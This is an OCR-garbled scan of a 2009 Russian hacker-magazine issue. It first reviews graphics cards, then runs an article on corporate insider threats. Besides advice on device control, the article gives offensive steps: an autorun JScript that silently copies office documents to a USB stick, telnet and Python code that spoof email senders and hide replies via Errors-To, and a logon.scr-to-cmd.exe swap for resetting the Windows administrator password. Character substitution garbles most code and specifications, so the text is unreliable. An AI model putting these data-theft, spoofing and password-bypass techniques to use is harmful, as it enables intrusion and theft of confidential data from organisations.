Технологический процесс, нм: 65 
Частота работы чипа, МГц: бОО 

Частота работы памяти, МГц: 1000 (1998 эффективная) 
Объем памяти, МБ: 512 6 Р 0 КЗХ 2 
Ширина шины, бит: 256 х 2 
Пропускная способность шины, Гбит/с: 62,4x2 
Поддерживаемый интерфейс: РСІ Ехргезз2.0х1б 
Выходы: 2х 6ѴІ, НБМІ 



О 




Несмотря на то, что размеры текстолита топовых моделей графических 
акселераторов сводят на нет все мечты о компактности и мобильности, 
чипмейкеры не останавливаются, предлагая все более изощренные 
варианты повышения производительности на старых мощностях. При- 
мер — бідаЬуІе ОѴ-ЫХ98Х1 0 Н I - В . Это чудо построено с использованием 
двух чипов 092. Опыт изготовления двухчиповых плату ІМѴЮІА есть, так 
что этот блин комом не назовешь. Каждый чип оборудован собственным 
блоком памяти и прочими необходимыми для работы компонентами. 
Совместная работа возможна благодаря той же технологии БЫ, которая 
реализована аппаратно. Линии РСІ-Ехргезз, мосты, все это собрано 
непосредственно на плате и не требует ресурсов самой платформы. 
Соединив два таких монструозных агрегата, можно получить связку под 
названием Оиаб БЫ — мечтулюбого техногенного рукоблуда. Технологии 
РигеѴібео И Б, НуЬгібРоѵѵег, НБМІсНБСР предусмотрены по умолчанию. 
В качестве микросхем памяти использованы чипы отБатзипд с време- 
нем отклика 0.8 нс, что соответствует 2500 МГц эффективной частоты. 

0 

Очень сильный шум, высокое энергопотребление, огромные размеры, 
неподдающиеся описанию — классические минусы высокопроизводи- 
тельных решений. 



СОМРАІМѴ ОР НЕК0Е5, 1б00Х1200, 4ХАА Р ІбХАР 



ХРХ6Х-280Ы-2009 
БаррЫге НО 4870X2 26 600К5 
БаррЫге Тохіс Нй 4850 512М 600РЗ 
бідаЬуІе 6Ѵ-ЫХ98Х16НІ-В 
бідаЬуІе 6Ѵ-МХ98Х512Н-В 
бідаЬуІе 6Ѵ-ЫХ881І768Н-В 

0 10 20 30 40 50 60 70 

ерз 



В этом тесте распределение достаточно явное, и особых сюрпризов нет. 
Лидерство сохраняют веете же платы 




Графический чип: ГСѴ770 
Количествотранзисторов, млн: 956 
Технологический процесс, нм: 55 
Частота работы чипа, МГц: 675 

Частота работы памяти, МГц: 1150(2300 эффективная) 

Объем памяти: 512 МБбйОКЗ 

Ширина шины, бит: 256 

Пропускная способность шины, Гбит /с: 71,9 

Поддерживаемый интерфейс: РСІ Ехргезз2.0хі6 

Выходы : 2 х РѴІ, 5 -ѴісІео 

••••••••00 



6000 руб. 

Классические видеокарты по прошествии времени становятся неин- 
тересны. Потребителю подавай новые модели, разнообразие, самовы- 
ражение, возможность выбирать. Компания БаррЫге всегда зани- 
маласьтолько выпуском плат на базе чипов Вабеоп, чем заслужила 
эксклюзивные права на изготовление модифицированных вариантов 
топовых моделей. В частности, мы рассмотрели версию на базе чипа 
АМБ ВѴ770. Плата БаррЫге Вабеоп НБ 4850 Тохіс может похвастаться 
увеличенными частотами и улучшенным охлаждением. Ранние версии 
Тохіс привлекали любителей разгона и бесшумного охлаждения, но 
на этот раз все более прозаично. На классическую неизмененную 
разводку установлен кулер производства 2а1тап — вот, собственно, и 
вся модификация. Кстати, в наборе еще можно найти огромное коли- 
чество сопроводительного программного обеспечения. В частности, 
речь идет о Роѵѵег БУО и БѴБ Би Те, а также о ЗБМагк ѴаЫаде в версии 
Абѵапсеб. 

0 

В качестве недостатка назовем не слишком удачную модификацию, 
которая по идее должна была быть плюсом устройства. Из однослото- 
вой карты мы получили двухслотовый габаритный вариант с неболь- 
шим понижением температуры. А ведь те 8% по чипу можно было бы 
получить и на дефолтном охладителе! 
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^ Геггигп 



ЗбМАКК’Об, ОѴЕРА1_І_ 



САІ_І_ОР ЛІАКЕ2, 1600X1200, 4ХАА, ІбХАР 



ЗаррЫге НЮ 4870X2 26 606К5 
бідаЬуІе 6Ѵ-ЫХ98Х16НІ-В 
ХРХ6Х-280Ы-2009 
бідаЬуІе 6Ѵ-ЫХ98Х512Н-В 
бідаЬуІе 6Ѵ-ЫХ88У768Н-В 
ЗаррЫге Тохіс НЮ 4850 512М бОбВз 

Магкз 



О 2000 4000 6000 8000 10000 12000 14000 16000 18000 



ХРХ 6Х-280ІМ-Ю09 
ЗаррЫге НЮ 4870X2 26 66 ОВ5 
ЗаррЫге Тохіс НЮ 4850 512М бООВз 
бідаЬуІе 6Ѵ-ЫХ98Х16НІ-В 
бідаЬуІе 6Ѵ-ЫХ98Х512Н-В 
бідаЬуІе 6Ѵ-ЫХ88У768Н-В 

ерз 
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Очевидным аутсайдером забега становится ЗаррЫге Тохіс НО 4850 512М 
бИЭРЗ. Лидирующую позицию по-прежнему занимает плата на базе все 
той же схемы АМО РѴ770 



Еще одинтест, который представители компании АМО оченьлюбят ис- 
пользовать для демонстрации новых графических плат. И действитель- 
но, за виси мость Са II о ^ 3 иагег от плат вышеупомянутой фирмы на лицо 





ЗаррЫге НР 4870 Х2 2 Ь ЬРРКбіХРХ 6Х-280М-2РР9 



кааеоп НО 4870X2 



Технические характеристики: 



Графический чип: 2хРѴ770 
Количествотранзисторов, млн: 956x2 
Технологический процесс, нм: 55 
Частота работы чипа, МГц: 750 

Частота работы памяти, МГц: 1000 (2000 эффективная) 

Объем памяти: 1 ГБ 6 РРК 5 Х 2 
Ширина шины, бит: 256 х 2 

Пропускная способность шины, Гбит/с: 62.5x2 (суммарно 174.4 при 
использовании СгоззРігеХЗісІеРогІ) 

Поддерживаемый интерфейс: РСІ Ехргезз 2.0 хіб 
Выходы : 2 х РѴІр 5 -ѴісІео 



СеРогсе 6 ТХ 280 



Технические характеристики: 



Графический чип: 6Т200 
Количествотранзисторов, млн: 1400 
Технологический процесс, нм: 65 
Частота работы чипа, МГц: 670 

Частота работы памяти, МГц: 1250 (2500 эффективная) 

Объем памяти: 1 ГБбРРРЗ 

Ширина шины, бит: 512 

Пропускная способность шины, Гбит /с: 141р7 

Поддерживаемый интерфейс: РСІ Ехргезз 2. Охіб 

В ыходы : 2 х БѴІ Р Б-Ѵісіео 



18000 руб. 



• о о 






Если уж в нашем обзоре есть 2-ядерная карта от ІЧѴЮІА, то было бы 
странно не рассмотреть аналогот компании АМб. Не такдавно адап- 
тер на базе двух РѴ770 считался самой быстрой видеокартой в мире, 
однако почивать на лаврах оставалось недолго. Адаптер достаточно 
большой по размеру, хотя с монстрами от ІЧѴЮІА в любом случае не 
сравнится. На задней стороне текстолита находится 8 схем памяти от 
Нупіх — это единственное, что не поместилось на лицевой стороне. 
Коммутация между чипами производится с помощью дополнитель- 
ного чипа производства РЕХТесЬпоІодіез. Этот мост поддерживает в 
сумме 48 линий РСІ -Ехргезз второй версии и потребляет всего 3.8 Вт 
электроэнергии. 



0 



Объединение двух чипов в одну упряжку чревато многочисленными 
проблемами, сложностями и глюками. Так что, перед тем как сделать 
ставку на пару резвых коней, подумай о возможных последствиях и 
желании с ними возиться. 



На прилавках магазинов эту плату можно встретить под названием ХРХ 
СеРогсе СТХ280ХХХ ЕсГібоп. Лично у нас «XXX» ассоциируется с продук- 
цией киностудии Ргіѵаіе, но, видимо, у маркетологов ХРХ другое пред- 
ставление. Следует отметить, что в связи с обилием вариантов, в которых 
производитель предлагает данную модель графического акселератора, 
мы решили указать инженерное наименование в качестве основного. 
Итак, подэтой маркой представлен фактически референсный образец 
видеоплаты от компании ІЧѴЮІА. Поэтому каких-либо дополнений 
ожидать не стоит. На сегодняшний день, если говорить об одночиповых 
решениях, —это высший класс от вышеупомянутого чипмейкера. В на- 
боре, помимо традиционных шнуров и диска с драйверами, можно найти 
табличку на дверь с надписью <ЮопЧ сІізГи гЬ. Гт датіпд!», а также диске 
игрой Азаззіп’з Сгееб. Приятный подарок! 

0 

Видеокарта питается от двух 6- контактных кабелей. Посему стоит озабо- 
титься мощным блоком питания с необходимым числом разъемов. Раз- 
меры видеокарты неуменышились, но вот шума стало заметно меньше. 



^ ВЫВОДЫ 

Выбор оказался нелегок, впрочем, те платы, что удостоились 
медалек, действительно хороши. Награду «Лучшая покупка» 

(в номинации «тонны ЕРЭза копейки») получает бідаЬуІе 6Ѵ- 
ІЧХ881І768Н-В. Несмотря на свои минусы, это хорошая плата, а 



за приятное дополнение производитель просит весьма незна- 
чительные денежки. Лучшей платой (результаты не дадут сов- 
рать) по праву назовем ЭаррЬіге НО 487 0 X2 20 600Р5. Награда 
«Выбор редакции» достается ей за наивысшую производитель- 
ность.^ 
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Угроза инсайда — одна из серьезнейших проблем корпоративной среды. 
Даже в организации с продуманной сетевой инфраструктурой остается 
опасность человеческого фактора. Защититься от людей, специально внед- 
ренных в компанию и обладающих техническими знаниями для сбора 
конфиденциальной информации, крайне сложно. Чтобы на корню предот- 
вратить такие попытки, необходимо, как минимум, быть знакомым с основ- 
ными приемами инсайдеров. 



Н ЗЛ0ЕЗЛ0, ИЛИ ВНЕШНИЕ НОСИТЕЛИ 

Данные, представляющие коммерческий интерес, есть в любой 
организации. Другое дело, что в небольшом рекламном агентстве об 
этом практически не задумываются, а на крупном оборонном заводе 
безопасностью занимается целый отдел. В последнем случае мно- 
гие действия работников жестко регламентируются. Одним из самых 
распространенных ограничений является запрет на использование 
внешних носителей. Забавное в этой ситуациито, что даже на очень 
серьезных промышленных предприятияхзапрещены ИЗВ-флешки 
и внешниежесткие диски, хотя любой работник по-прежнему может 
использоватьтелефон, плеер и кучу других устройств, которые отлично 
могут применяться для переноса данных. Впрочем, у недобросовес- 
тного работника куда больше вариантов для подключения! Помимо 
банального ИЗВ, это могут быть порты СОМ, ОРТ и Рігеѵѵіге, интерфей- 
сы ЮЕ и 5АТА, разъемы РСМСІА или технологии для беспроводной 



передачи данных ВІиеІюоіН, ѴѴі-Рі, ІгРа. Проблема неконтролируемого 
движения информации внутри защищенного периметра — настоящая 
морока для системных администраторов, но при желании можно решить 
и ее. Неоценимую помощь в этом оказывают специальные програм- 
мные инструменты вроде ОеѵісеІ_оск [ ѵѵѵѵѵѵ.сіеѵісеіоск.сопп/ги ). Ііоск 
( ѵѵѵѵѵѵ.зесигіВги/ргобисІз/іпІюМоск ]. Бапсіиагу Оеѵісе Сопігоі ( ѵѵѵѵѵѵ. 
[итепзіоп.сот ]. Мониторы доступа устанавливаются на все компью- 
теры и внедряются в операционную систему на уровне ядра, не давая 
пользователю отключить их или обойти (кстати, МісгозоЙ заблокиро- 
вала возможность модификации ядра в ѴѴіпсІоѵѵз Ѵіз1:а], либо задают 
соответствующие политики на уровне домена. В основе каждой лежит 
список контроля доступа, состоящий из идентификаторов доверенных 
устройств. Правило простое: если устройство не опознано (то есть не 
входит в доверенный список], — доступ запрещается. 

ѴѴіпсІоѵѵз Зегѵег 2008, которую многие еще неуспели «пощупать как 



► 016 



ХАКЕР 02 /122/ 09 





Этот скрипт автоматически запустится при монтировании 
флешки и скопирует нужные файлы 



следует», предоставляет возможность защититься от по- 
добных опасностей штатными средствами Асбѵе Оігесіогу. 
Контроль доступа реализуется через оснастку групповых 
политик (І_осаІ Огоир Роіісу Есіііог), — ее можно вызвать ко- 
мандой «сш<5. ехе > дресііР .шзс». В появившемся окне 
необходимо выбрать Асітіпізіхабѵе Тетріаіез-Бузіет- 
Эеѵісе Іпзіаііабоп. Далее шагаем в АІІоѵѵ іпзіаііаіііоп о^ 
сіеѵісезіфаі: та1;сЬ апу оіЧЬезе беѵісе Юз и вот здесь-то ука- 
зываем идентификаторы тех устройств, которые могут быть 
при монтированы в систему. К примеру, можно включить 
пользователю флоппи или же наоборотзапретить его. Как 
узнать эти идентификаторы? При включении той же флеш- 
ки в компьютер перейди в Оеѵісе Мападег («Мой компьютер 
-> Управление -> Диспетчер устройств») и внимательно 
посмотри на идентификаторы каждого 115В МаззЗіогаде 
Оеѵісе. Они имеют примерно следующий вид: 

Б8В8Т0К\Бізк&Ѵеп_БеРЕІаз]і&Ргос1_ 

ТЗ 2 С БЕ ѴЗ О &Кеѵ_8 . 0 7\ХХХХХХХХ & 0 , 

Где ХХХХХХХХ — и есть тот са м ы й 1 0 . 

Обновив список контроля доступа, не забудь о команде 
дрирсіаію — чтобы изменения отразились в системе. Вот 
такое полезное нововведение серверной Винды! 

Н ДАВАЙ СДЕЛАЕМ ЭТО ПО-БЫСТРОМУ 

О контроле доступа подключаемых носителей администрато- 
ры задумываются далеко не всегда, а это значит, что утащить 
ценные данные может не только собственный работник, но и 
вообще любой человек, случайно оказавшийся у компьютера. 
Причем, чтобы не копаться вручную и не привлекать внима- 
ние своими лихорадочными действиями в «Проводнике», он 
вполне может подготовиться и сварганить скрипт, который 
сам просканирует доступные диски и отберет нужные файлы 
по заданным критериям. Написать подобную приблуду ничего 
не стоит на том же самом ЗаѵаЗсгірГе. Попробуем сами. Сна- 
чала с помощью вспомогательных переменныхобозначим 
интересующие расширения файлов, которые нужно копи- 
ровать, а также укажем давность обновления файла (более 
древние файлы буд^д просто игнорироваться): 

ѵаг раРсЬ. = /\ . (Бос I гРР | хіз I РхР) $/і; 

ѵаг БІРР = петл БаРе (2007,05,01) ; 

Далее пишем класс, который будет рекурсивно обходить 
носители. Для каждого объекта проверяется расширение 
и дата создания, после чего принимается решение о его 
копировании на флешку: 




В сборе информации поможет инструмент Маііедо, который занимается кроулингом 
информации по сети в поисках любых данных о персоне, электронной почте, адресах 
и та к дал ее 



ѵаг зоРРхѵагеЕпитегаРог = печл ЕпитегаРог ( 
зоРРчлагеЕоІсІег .Еііез) ; 
зоРРмагеЕпитегаРог .тоѵеЕігзР () ; 

Рог (; ! зоРРмагеЕпитегаРог . аРЕпБ ( ) ; 
зоРРмагеЕпитегаРог .тоѵеБехР ( ) ) 

{ 

ІР ( ( зоРРмагеЕпитегаРог . іРет ( ) . 

Бате .таРсЪ. (раРсЬ) ) 

&& ( (БаРе.рагзе ( зоРРмагеЕпитегаРог . 
іРет ( ) . БаРеСгеаРеБ) >= БіРР . деРТіте ( ) ) 

I I (БаРе . рагзе ( зоРРмагеЕпитегаРог . ІРет ( ) . 
БаРеБазРАссеззеБ) >= сііРР . деРТіте () ) 

I I (БаРе .рагзе ( зоРРмагеЕпитегаРог . ІРет ( ) . 
БаРеБазРМосІіРіесІ) >= сііРР . деРТіте ( ) ) ) ) 

{ 

Ргу 

{ 

Рзо . СоруЕіІе ( ## копируем файл в нужное 

место) ; 

} саРсЪ. (е) { 

ІР (е.питЬег == 61) { 

МЗсгірР . <2иіР ( 0 ) ; 

} 

} 

} 




> ІП^О 

Файлы -документы 
ОДісе 97 имеют поле 
61ІЮ (глобальный 
идентификатор), 
содержащее МАС- 
адрес компьютера. 
Чтобы извлечь эту 
информацию, доста- 
точно воспользовать- 
ся НЕХ-редактором, 
поискав по строке 

«еіію». 



Полную версию скрипта с обработкой исключений ты 
найдешь на нашем диске. Чтобы скрипт запускался 
автоматически, злоумышленник может забросить на 
флешку .іпі- файл с информацией об автозагрузке. С 
помощью интерпретатора ѵѵбсгі рі он будет выполнять 
наш скрипт: 



[аиРогші] 

зЬ.е11ехесиРе=тлзсгірР аиРогип.^з 

зЬе11=ирБаРе 

зЬе11\ирБаРе=0бновить 

зЬеІІХирБаРеХсоттапБ^зсгірР аиРогип. з з 

В ПРЕМУДРОСТИ ПРАВИЛЬНОЙ ПЕРЕПИСКИ 

Пожалуй, нигде не найти более актуальной и ценной 
информации, чем в почтовых аккаунтах топ-менед- 
жеров или даже рядовых сотрудников. Для доступа к 
ним злоумышленники порой идут на самые нестан- 
дартные решения и активно используют социальную 
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** Ыішіоиз МТ/2к/ХР/УІ5ѣа СЬалде РаззиогД / Ведіхігу ЕД Ног / Вооі СВ 
Сс) 1998-200? Реііег МогЛаЫ -Надел . БізігіЪиІеД ипДег СМІІ 6РЬ у2 

* ВІЗСЬАІМЕН: ТНІЗ ЗОГТНАКЕ СОПЕЗ ЫІТН АВЗОИЛЕЬѴ МО ЫАВНАНПЕЗ! 

ТНЕ АІЛНОК САИ ИОТ ВЕ НЕІЛ ВЕЗРОМЗІВЬЕ ГОК АИѴ ВАМАСіЕ 
САІІЗЕВ ВѴ ТНЕ (МІЗ)ІІЗЕ ОГ ТНІЗ ЗОГТНАКЕ 

Ноге ілГо аі: Ьіір ://Ьоте .еилеі .ло/~рпог<1аЫ2піра55и<І2 

* ЕшаіІ : рпогдаЫееилеі . по 

СВ ЪиіЫ Даіе: ТВи Зер 27 20:57:41 СЕЗТ 2007 



Ргез5 епіег іо Ьооі, ог діие Нпих кегле I Ьооі орііопз Гігзі ІГ пееДеД. 
Воте іііаі I Вайе іо изе олсе іп а иВПе: 

Ьооі лоизЬ - іо іигп оГГ 115В ІГ лоі изеД алД іі саизез ргоЫетз 

ІЬооі ігдроіі - ІГ зоте Дгіиегз Валд иііВ ігд ргоЫет теззадез 

Ьооі лоДгіѵегз - зкір аиіотаііс Дізк Дгіиег ІоаДілд 



Ьооі : 



ВооЮй для сброса пароля администратора 




> ѵѵагпіпд 

Информация пред- 
ставлена исклю- 
чительно в целях 
ознакомления, чтобы 
указать представите- 
лям различных ком- 
паний на возможные 
бреши в безопаснос- 
ти. За использование 
материалов статьи 
в противозаконных 
целях автор и редак- 
ция ответственности 
не несут. 




> СІѴСІ 



На дискеты найдешь 
инструменты для 
защиты от инсайда, 
а также утилиты для 
сбора инфы. 



инженерию. Пускай на простые уловки уже никто 
не идет, но и здесь свои премудрости. Вот что ты 
будешь делать, если оттвоего непосредственного 
начальника придет письмо: «Пришли мне, пожа- 
луйста, документ, над которым мы работали вчера»? 
Вероятно, ругнувшись на предметность разговора, 
вышлешь какой-нибудь файл, добавив на всякий 
случай вопрос: «этот?». 

А теперь повод для размышления: многие 5 МТР-сер ве- 
ры можно использовать как Веіау и спуфить (подделы- 
вать] адрес отправителя. Тут есть свои ограничения, но 
в целом прием работает на ура. Напомню, что сделать 
это можно прямо через іеіпеі: 



кеіпек зткр_зегѵег 25 

>22 0 зткр . * . ги ЕЗМТР Зепсіе-таіі 8. 9. 3/8. 9.3; 
Моп, 27 Мау 2002 17:38:54 +0400 (МЗБ) 

Ъ.е1о зткр_зегѵег 

>500 Соттапсі ипгесодпігесі: {{}1іе1о зткр_зегѵег 
— нас послали 

> 250 зткр. ріеазесі Со теек уои — все, 

едем дальше 

е-таіі кгот: 

тізЬаОгеаІ . хакер . ги 

гсрк ко: 1атег@е-таі1 . ги 

сіака пишем_текст [епкег] 



Хннт сВЮЗ ’ ом 

Контроль доступа к подключаемым девайсам — это 
хорошо. Но бреши остаются даже при установке серь- 
езных дорогостоящих решений для контроля подклю- 
чаемых устройств. Дело в том, что многие материнские 
платы поддерживают горячую клавишу для выбора 
загрузочного устройства и при этом лишены возмож- 
ности ее отключения. То есть, даже при закрытом паро- 
лем БИОСе можно во время загрузки выбрать вариант 
запуска с внешнего носителя. Тут актуальны инстру- 
менты вроде ІлѵеСО на базе Ілпііх. Таким образом 
можно обойти многие ограничения и получить доступ 
к жестким дискам. Более того, злоумышленник может 
даже сбросить пароль администратора с помощью 



специальной утилиты или следующей уловки. Сначала 
выполняем команды: 

С : \> ссі \ѵ^іппк\зузкеш32 

С : \ѵ\шппк\зузкет32> сору Іодоп. зсг Іодоп. 

зсг . оісі 

С : \міппк\зузкет32> сіеі Іодоп. зсг 

С : \міппк\зузкет32> сору стсі.ехе Іодоп. зсг 

Теперь перегружаемся и, погладывая на окно для ввода 
логина и пароля, ждем, пока система не попытается за- 
пустить хранитель экрана. А коль уж мы подменили его 
файлом стсі.ехе, то вместо строящегося водопровода 
или другой красоты, увидим окошко командной стро- 
ки. Далее меняем пароль системного администратора 
командой пег изег асітіпізіігаііог <пеѵ\фа 55 ѵ\гог<і> . 



► 018 
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[епЕег] 

250 КАА07552 Меззаде ассерЕесі Еог сіеііѵегу 

При удачном раскладе сообщение будет доставлено жертве с содер- 
жанием домена геаі.хакер.ги в адресе отправителя. Конечно, трюк 
можети неудаться. Во-первых, ЗМТР-север может банально запретить 
релейинг или обслуживать пользователей из какой-то конкретной под- 
сети ІР-адресов. Во-вторых, злую шутку может сыграть пограничный 
транспорт или агент кодов. Если рассматривать ситуацию с Ехсбапде 
5егѵег2007,то подмену сильно затрудняет та к называемый код отпра- 
вителя, который заносится в метаданные каждого сообщения. Получив 
почтовое сообщение, граничный транспортный сервер запрашивает 
сервер БЫВ отправителя, чтобы убедиться, что ІР-адрес, с которого 
было получено сообщение, уполномочен отправлять сообщения на 
домен, указанный в заголовках сообщения. А анализ кода отправителя 
используется для оценки вероятности того, что присланное письмо 
не является спамом. Подобные механизмы дают неплохой результат и 
сильно осложняют процесс спуфинга. 

Но предположим, все провернули удачно, вписали в сообщение нуж- 
ный текст и даже прикрепили опасный аттачик— кактеперь получить 
от человека ответ? Указывать левый адрес в поле Реріу-То — большое 
палево. Такой мейл тутже отобразится в почтовом клиенте и вызовет 
подозрения у более-менее подкованного юзера. Тутесть один хинт: 
вместо Реріу-Ео можно использовать служебный заголовок Еггогз-То, 
указав адрес, на который будет отправлено письмо в случае ошибки. 
Если адреса, указанного в поле Реріу-Ео, не существует (он может быть 
из доверенного домена), то письмо будет отправлено на адрес, указан- 
ный с помощью Еггогз-То. 

То : з егЕ ѵа@таі 1 . ги 

Ргот: ЗиррогЕ <зиррогЕ@тісгозоЕЕ . сот> 

Керіу-То : ЗиррогЕ <Еесітіса1 . зиррогЕѲтісгозоЕЕ . сош> 
Еггогз-То : ЗиррогЕ шое_ші1о@шаі1 . ги 

В нашем случае, если адреса ІесЬпісаЕ зиррогШтісгозоІЕ.сот не су- 
ществует, то письмо будет перенаправлено на тое тііойтаіі.ги . Удоб- 
но это тем, что жертва может посмотреть заголовок Реріу-То в клиенте, 
но ни один клиент не покажетзаголовок Еггогз-То — если, конечно, не 
посмотреть все Ьеабег’ы письма. Теперь подумаем, как сконструировать 
такие заголовки без заморочек (сЕеІпеЕ или пеіюаі можно капитально 
намучиться]. Для решения проблемы подойдет любой язык програм- 
мирования, худо-бедно поддерживающий работу с 5МТР. Мы будем 
использовать Руібоп, — сЗМТРон работает очень даже неплохо :). 
Сначала подключаем необходимые модули: 

ітрогЕ зтЕрІіЪ, зуз, МітеШгіЕег, тітеЕурез, тітеЕооІз, 
Ьазеб4 

Далее колдуем с заголовками сообщения, указывая нужные адреса в 
Веріу-То и Еггогз-То и используя специальный метод асИЕіеасІегО: 

шгіЕег = МітеШгіЕег .МітеШгіЕег (теззаде) #вызов функции 
для подготовки импорта почтовых заголовков 
шгіЕег . асІсПтеасІег ( ' То ' , Со) 
шгіЕег . асМЬеасІег ( 'Ргот' , зепсіег) 

шгіЕег . асМЬеасІег ( 1 Керіу-То 1 , ' изиа1@таі1 . ги ' ) #сюда 

придет ответ после спуфинга 

шгіЕег . асМЬеасІег ( ' ЗиЪз есЕ 1 , зиЬз есЕ ) 

шгіЕег . асМЬеасІег ( 1 МІМЕ-Ѵегзіоп ' , '1.0') 

ѵпгіЕег . зЕагЕтиІЕірагЕЪосІу ( 'тіхесР ) 

Теперь добавляем само сообщение: 

рагЕ = шгіЕег .пехЕрагЕ ( ) 

Ьосіу = рагЕ . зЕагЕЬосІу ( ' ЕехЕ/рІаіп ' ) 




Для оценки того, как часто производился доступ к тем или иным 
файлам, можно воспользоваться простой и всем известной 
командой с такими флагами: 

Ьіг /Е:а /а /з /о: <5 с 

(успешное выполнение команды предоставляет рекурсивный 
список каталогов всех времен доступа к файлам на диске С) ; 

Ьіг / Е : ѵ? /а /з /о:с! д. 

(список каталогов всех времен модификации файлов на диске Б) ; 

Ьіг /Е : С /а /з /о:с! е 

(список каталогов всех времен создания файлов на диске Е) . 

В сетевых окружениях или сервисах, например, РТР-серверах, 
также есть свои инструменты. В случае с РТР интерес представ- 
ляет команда ЗІТЕ ЗТАТ5, отображающая статистику работы с 
РТР-сервером с выводом использованных команд. 



рагЕ . ЕІизЬЬеасІегз ( ) 

Ьосіу . ѵигіЕе (ЕехЕ) 

И последний этап — собственно отправляем письмо, используя функ- 
цию зепсІтаіШ: 

зтЕр = зтЕрІіЬ. ЗМТР (ЗЕКѴЕК, РОЕТ) 
зтЕр . зеЕ_ЬеЬид1еѵе1 ( 1 ) 

зтЕр . зепЬтаіІ ( зепсіег , Ео, теззаде . деЕѵаІие ( ) ) 
зтЕр . диіЕ ( ) 

Полную версию скрипта, в том числе, с частью кода, отвечающего за 
работу саттачами.ты найдешь на 0Ѵ0. Воттакая корпоративная уловка 

— диалоги о природе и птичках со службами ИБ различных компаний 
велись, благодаря этим трюкам, целыми сутками. 

^ ГДЕ ЖЕ ТЫ, МОЯ ЗВЕЗДА? 

Часто именно с помощью социальной инженерии раскрываются наибо- 
лее важные сведения о внутреннем устройстве сети. Знание некоторых 
деталей, которые можно упомянуть в разговоре, сильно облегчит задачу 
социальному инженеру. Такие данные можно собрать изтехже самых 
заголовков почтовых сообщений, генерируемых почтовыми демонами. 
Например, если отправить сообщение на адрес несуществующего в 
системе пользователя, то с большой вероятностью получишь ответ 
(«рикошет») от интересующего тебя сервера, в котором помимо ошибки 
(«Извините, такого пользователя не существует»), скорее всего, ока- 
жется интересная информация. Чаще всего, это внутренний ІР-адрес 
и имя самого почтового сервера. Хочу отметить, что прием особенно 
эффективен с серверами ЕхсЬапде, расположенными за каким-либо 
почтовым ретранслятором. 

В ход также идут различные средства, чтобы узнать больше о поль- 
зователе. Задача усложняется в случае использования им средств 
анонимизации (прокси и т.п.]. В данном случае особенно рекомендую 
обратить внимание на проект от создателей известного хакерского 
комбайна МеЕазрІоіЕ — йесіоак ( сіесіоак.пеі ). Он предназначен для ра- 
зоблачения особо хитрых людей, которые думают, что хорошо замас- 
кировались. В арсенале у него несколько приемов, первый из которых 

— вызов специальной функции на языке іаѵа. Если у пользователя 
установлен Оиіск Тіте, то путем загрузки специального параметра ап- 
плет будет пытаться вынудить браузер жертвы открыть прямое (сМгесЕ) 
соединение и выдать свой настоящий адрес. Другой способ — метод 
загрузки ѴѴогсІ -документа с его авто-открытием, в случае которого со 
стороннего ресурса незаметно будет подкачена картинка, что может 



ХАКЕР 02 /1 22/ 09 



► 019 










^ 'х&Лт ИФ 






■Зі Й ^УІ і 41 11 



1 РФ™ ЬФпімДиП 






ІРйй^Р.”Е^ 



в ^трлѵЕ^еподр 
Ѳ- ^РШіШДАРТОРѴЛйоч*ХР 
ф1Э»№АДОа 

- Ф к#чмѵ Ріа* р№в ІЕЕЕ 1 Э34 ЗВР2 От 
А А05 Т есЬпЫо 5 РВ_ Іпс. ТЗМ 5йа0*+Йдааі« ІЕЁЕ 1394 5ВР2 ЕОеѵін 

Керзон ры«<№ аддо #? 

<І0Т5 ИНЕѴЛНЕ САЙІ.Е ІЕЕЕ 1334 5ВР2 ОеФе 
^ МіаиоА ѲіоаВЬопсІ Нгіѵчогкігщ ѴЛФ« Нс НіЬяк Мціі и 
% РСМОА М Ш 0002 
% РСМОА ІОЕ./АТАРІ СЬпЬоІи 
% РСМОА І0Е/АТАР1 С^пЬЫМ* 

^ РСМОА ЮЕ/АТАРі СопЬоіи 
%Хкшп ОвЯСасІ ѲУвГмЙі Аіаріеі 

% _1ЕХйЩАТА_ОАЗ НСДПС) _5Г0ЙМ„ 

ффіВМ Тіаѵеі Мш» [НІО] 

и ^Кедодіоп ИЗО МоимТп'аГВоиЗооІ 
^и&0 РіМпдЗііНюі 
(6іА§ЕВЗЕ5 РОДТАВЦЕ САЙО НЕДОЕВ 

^ не с две гісри 
и #нес изв дроооч иве о™ 

^СѵэлоАиВ-0 СѳтрмАе Ооиісе 
4 СуоФп ВйЛо Рвві Р«І 
^Су^чепВЫіо ЕінесІРйгі 
^СдаііопОЕСТ РійоыІЗикк 
' СучиопОЕСТ РгаІоссІЗіаск 

Су^рІОП ІЕОСІІГСИМВ СЗвѵк* 

Сдавоп ІЗосНппнн Оміс* 

МІсгаоПУ/афс* Т гдоожзі Га ВМоЫК 
058 Сотрите Овѵіее 
1133 АиФ Овѵісе 
ЕРЗОИ РцГнйт <330 
ЙФЬонК^ЮОО 
_ Веікіп Р5У 4СЭ ЗаіаІ Рои [СОМ27І 
Й%5«*ОЗС 

фъѵту зог^озс две аеы* 



іі_ 





йЛЛв 






ѵ« 


Ѵ1Э94\НІС1Э94\172ѲОЗСОЕ1С 


шно 


ЛЛЛв 


ОпШііго 


Оі&йгёе* 


№з 


30Р2\шннеиви„йд«щойіѵі^нішос , 


шно 




совам 


аѵо/сотим*™ 


Но 


&ВР2ѴЧ)5_ТЕСННОі0еЕЗ_ТНС;_.ЫЗЭ4Л 


шно 


РіюѴЛь 


Ітаае 


Ілівдіпд Лѵісы 


Но 


ЗВР2\ЕРЗОМШТ'Х0ОО _Ш)НО\000{ 


шно 


ЕівѴЛе 


С'икОілп 


Ойк. скіуві 


Но 


5ВР2М0Т5 *ИНЕѴЛИЕ_САВІЕ_ШІНС1' 




РСМОА 


МА 


Ыар1сг4 


Но 


РСМаА\ИСВО50ПиЛНЕІЕ 53.М0 ТЕВООРІ !; 




РСМОА 






Но 


РСМС1А\Мт-СС02Ч 




РСМОА 


Ыс 


ІОЕ АТА/АТАРІ СбЫоЪи 


Но 


РСМС1А\02МІГООМЕМІЖГС4РІОВУ5_АТА.Е Ь 




РСМОА 


Ь(1д 


ІОЕ АТАЙТАРІ сопйоінв 


Но 


РСМСІА\$АМ51№С-ПЕѴ_1.1 00А\1 




РСМОА 


Ыс 


ЮЕАТАЙТАРІ сопЫЬ.! 


Но 


рсмсіАч^тыіне - рміоЕ' А зс-^адм 




РСМОА 


РаЬ 


РЫИ00ИМРТ] 


Но 


РСМС АЧКІПС0М-СВЕ ОіТСАВа -ВІУЕТ00ТН- > 




РСМОА 


Ыс 


ІОЕ АТ А/Д ТАР еаійоісн 


Но 


РШСАѴ.іЕХйй>Т А_РІАЗН_САЙ& .5- 1 


иЗВ Оеѵісе 


изо 


